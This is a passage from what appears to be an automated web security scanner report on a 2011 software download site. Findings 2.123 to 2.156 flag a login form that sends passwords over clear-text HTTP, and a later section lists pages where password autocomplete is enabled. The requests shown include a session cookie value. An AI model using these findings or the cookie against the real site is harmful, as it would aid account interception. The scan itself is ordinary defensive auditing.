Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.123. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.124. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.125. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.126. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.127. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.128. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

2.129. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.130. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.131. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.132. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.133. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.134. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.135. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.136. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.137. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.138. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.139. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.140. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.141. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.142. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.143. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.144. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.145. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /drivers/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.146. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.147. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /featured-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.148. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /linktous.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.149. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /new-reviews.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.150. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /new-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.151. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.152. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

Response

2.153. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /software-advanced.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.154. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /submit-pad-file.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.155. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /tellafriend.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

2.156. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /top-software-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

3. Password field with autocomplete enabled previous next
There are 156 instances of this issue:

/
/64-bit-archive-downloads.html
/64-bit-assembling-downloads.html
/64-bit-atom-downloads.html
/64-bit-audio-downloads.html
/64-bit-automatic-downloads.html
/64-bit-autoposter-downloads.html
/64-bit-binaries-downloads.html
/64-bit-binary-downloader-downloads.html
/64-bit-binary-downloads.html
/64-bit-board-downloads.html
/64-bit-boards-downloads.html
/64-bit-client-downloads.html
/64-bit-commander-downloads.html
/64-bit-community-downloads.html
/64-bit-complex-downloads.html
/64-bit-conference-downloads.html
/64-bit-cross-downloads.html
/64-bit-download-downloads.html
/64-bit-downloader-downloads.html
/64-bit-explorer-downloads.html
/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
/64-bit-fast-download-downloads.html
/64-bit-feed-downloads.html
/64-bit-feedreader-downloads.html
/64-bit-file-grabber-downloads.html
/64-bit-file-sharing-downloads.html
/64-bit-firefox-downloads.html
/64-bit-forum-c-44-newsgroup-clients-downloads.html
/64-bit-forum-downloads.html
/64-bit-forums-downloads.html
/64-bit-google-groups-downloads.html
/64-bit-grabber-downloads.html
/64-bit-group-downloads.html
/64-bit-groups-downloads.html
/64-bit-highspeed-connection-downloads.html
/64-bit-image-grabber-downloads.html
/64-bit-images-downloads.html
/64-bit-internet-c-44-newsgroup-clients-downloads.html
/64-bit-internet-downloads.html
/64-bit-kill-file-downloads.html
/64-bit-killfile-downloads.html
/64-bit-mp3-downloads.html
/64-bit-multimedia-downloads.html
/64-bit-multipart-downloads.html
/64-bit-news-c-44-newsgroup-clients-downloads.html
/64-bit-news-downloads.html
/64-bit-news-reader-downloads.html
/64-bit-newsfeed-downloads.html
/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroup-downloads.html
/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
/64-bit-newsgroups-downloads.html
/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
/64-bit-newsreader-downloads.html
/64-bit-nntp-c-44-newsgroup-clients-downloads.html
/64-bit-nntp-downloads.html
/64-bit-nzb-downloads.html
/64-bit-ozum-downloads.html
/64-bit-par-downloads.html
/64-bit-podcast-downloads.html
/64-bit-posts-downloads.html
/64-bit-rar-downloads.html
/64-bit-reader-c-44-newsgroup-clients-downloads.html
/64-bit-reader-downloads.html
/64-bit-reading-downloads.html
/64-bit-rss-c-44-newsgroup-clients-downloads.html
/64-bit-rss-client-downloads.html
/64-bit-rss-downloads.html
/64-bit-rss-feed-reader-downloads.html
/64-bit-rss-reader-downloads.html
/64-bit-search-downloads.html
/64-bit-ssl-downloads.html
/64-bit-synchronization-downloads.html
/64-bit-synchronize-downloads.html
/64-bit-topic-downloads.html
/64-bit-troll-downloads.html
/64-bit-troll-killer-downloads.html
/64-bit-trollkiller-downloads.html
/64-bit-use-next-downloads.html
/64-bit-usenet-c-44-newsgroup-clients-downloads.html
/64-bit-usenet-downloads.html
/64-bit-usenet-search-engine-downloads.html
/64-bit-usenext-downloads.html
/64-bit-video-downloads.html
/64-bit-xpat-downloads.html
/64-bit-yenc-downloads.html
/a-oz-insight-1768-downloads.html
/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
/categories/free-64-bit-business-downloads-2-0-d.html
/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
/categories/free-64-bit-communications-downloads-3-0-d.html
/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
